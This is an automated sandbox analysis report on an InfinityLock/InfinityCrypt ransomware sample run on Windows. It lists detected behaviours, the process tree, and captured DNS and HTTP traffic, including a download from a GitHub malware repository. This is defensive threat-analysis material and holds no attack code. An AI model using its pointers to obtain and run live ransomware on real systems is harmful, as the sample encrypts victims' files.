Analysis

  • max time kernel
    301s
  • max time network
    305s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250113-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    27/01/2025, 17:25 UTC

General

  • Target

    https://github.com/Endermanch/MalwareDatabase

Malware Config

Signatures

  • InfinityLock Ransomware

    Also known as InfinityCrypt. Based on the open-source HiddenTear ransomware.

  • Infinitylock family
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Drops file in Program Files directory 64 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 13 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • NTFS ADS 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of SetWindowsHookEx 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://github.com/Endermanch/MalwareDatabase"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2604
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://github.com/Endermanch/MalwareDatabase
      2⤵
      • Checks processor information in registry
      • Modifies registry class
      • NTFS ADS
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3552
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1956 -parentBuildID 20240401114208 -prefsHandle 1872 -prefMapHandle 1864 -prefsLen 26929 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {78004f1c-2839-4cb3-8789-197bc5953cf5} 3552 "\\.\pipe\gecko-crash-server-pipe.3552" gpu
        3⤵
          PID:4048
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2392 -parentBuildID 20240401114208 -prefsHandle 2384 -prefMapHandle 2380 -prefsLen 27849 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {edd815f2-9ef6-4ad8-a5fd-9bbf5ca9e6b7} 3552 "\\.\pipe\gecko-crash-server-pipe.3552" socket
          3⤵
            PID:1532
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3092 -childID 1 -isForBrowser -prefsHandle 3084 -prefMapHandle 3080 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf80e038-47ba-44b0-8c46-9cf3b31b57d6} 3552 "\\.\pipe\gecko-crash-server-pipe.3552" tab
            3⤵
              PID:3876
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3716 -childID 2 -isForBrowser -prefsHandle 3708 -prefMapHandle 3036 -prefsLen 32339 -prefMapSize 244658 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3e64bda-7a97-4ec3-b79c-8f6fd68e7295} 3552 "\\.\pipe\gecko-crash-server-pipe.3552" tab
              3⤵
                PID:2700
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4504 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4552 -prefMapHandle 4548 -prefsLen 32339 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ef146d7b-e135-41d0-83f4-c2fca60330d9} 3552 "\\.\pipe\gecko-crash-server-pipe.3552" utility
                3⤵
                • Checks processor information in registry
                PID:1460
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5500 -childID 3 -isForBrowser -prefsHandle 5564 -prefMapHandle 5560 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ab52503d-a223-4acc-9a2a-f0c79ccbe588} 3552 "\\.\pipe\gecko-crash-server-pipe.3552" tab
                3⤵
                  PID:3448
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5704 -childID 4 -isForBrowser -prefsHandle 5724 -prefMapHandle 5712 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {737bef62-a25f-4f7e-b686-ee47ee3fd6bd} 3552 "\\.\pipe\gecko-crash-server-pipe.3552" tab
                  3⤵
                    PID:3792
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5680 -childID 5 -isForBrowser -prefsHandle 5908 -prefMapHandle 5912 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {07e5623f-2dd2-4587-a208-7972fb108963} 3552 "\\.\pipe\gecko-crash-server-pipe.3552" tab
                    3⤵
                      PID:3488
                • C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  "C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
                  1⤵
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  • Suspicious behavior: AddClipboardFormatListener
                  • Suspicious use of SetWindowsHookEx
                  PID:5284
                • C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe
                  "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mca
                  1⤵
                  • Suspicious use of SetWindowsHookEx
                  PID:4604
                • C:\Windows\System32\SecurityHealthHost.exe
                  C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                  1⤵
                    PID:1164
                  • C:\Windows\System32\SecurityHealthHost.exe
                    C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                    1⤵
                      PID:3900
                    • C:\Windows\System32\SecurityHealthHost.exe
                      C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                      1⤵
                        PID:2488
                      • C:\Windows\System32\rundll32.exe
                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                        1⤵
                          PID:2652
                        • C:\Users\Admin\Downloads\InfinityCrypt\Endermanch@InfinityCrypt.exe
                          "C:\Users\Admin\Downloads\InfinityCrypt\Endermanch@InfinityCrypt.exe"
                          1⤵
                          • Drops file in Program Files directory
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5496

                        Network

                        • flag-us
                          DNS
                          8.8.8.8.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          8.8.8.8.in-addr.arpa
                          IN PTR
                          Response
                          8.8.8.8.in-addr.arpa
                          IN PTR
                          dnsgoogle
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN A
                          Response
                          github.com
                          IN A
                          20.26.156.215
                        • flag-us
                          DNS
                          spocs.getpocket.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          spocs.getpocket.com
                          IN A
                          Response
                          spocs.getpocket.com
                          IN CNAME
                          prod.ads.prod.webservices.mozgcp.net
                          prod.ads.prod.webservices.mozgcp.net
                          IN A
                          34.117.188.166
                        • flag-us
                          DNS
                          firefox-api-proxy.cdn.mozilla.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          firefox-api-proxy.cdn.mozilla.net
                          IN A
                          Response
                          firefox-api-proxy.cdn.mozilla.net
                          IN CNAME
                          firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                          firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                          IN A
                          34.149.97.1
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          upgrade-insecure-requests: 1
                          sec-fetch-dest: document
                          sec-fetch-mode: navigate
                          sec-fetch-site: none
                          sec-fetch-user: ?1
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:26:20 GMT
                          content-type: text/html; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"cbb6609574879b9fc31d7496f6399f94"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          set-cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D; Path=/; HttpOnly; Secure; SameSite=Lax
                          set-cookie: _octo=GH1.1.216770144.1737998780; Path=/; Domain=github.com; Expires=Tue, 27 Jan 2026 17:26:20 GMT; Secure; SameSite=Lax
                          set-cookie: logged_in=no; Path=/; Domain=github.com; Expires=Tue, 27 Jan 2026 17:26:20 GMT; HttpOnly; Secure; SameSite=Lax
                          x-github-request-id: C31B:3BC911:17A890:1BB0E7:6797C1BC
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/latest-commit/master
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/latest-commit/master HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"27ad9379f8d0879f6d62fe8ef65a2c3d"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 84
                          x-github-request-id: C31B:3BC911:17A9AD:1BB243:6797C1BE
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/refs?type=branch
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/refs?type=branch HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"2879663a9926b481c91f72f932d501eb"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 439
                          x-github-request-id: C31B:3BC911:17A9AA:1BB23F:6797C1BC
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/tree-commit-info/master
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/tree-commit-info/master HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"57dd3ff551f8b3d10b3856a048bab63c"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 53
                          x-github-request-id: C31B:3BC911:17A9B2:1BB247:6797C1BE
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/branch-and-tag-count
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/branch-and-tag-count HTTP/2.0
                          host: github.com
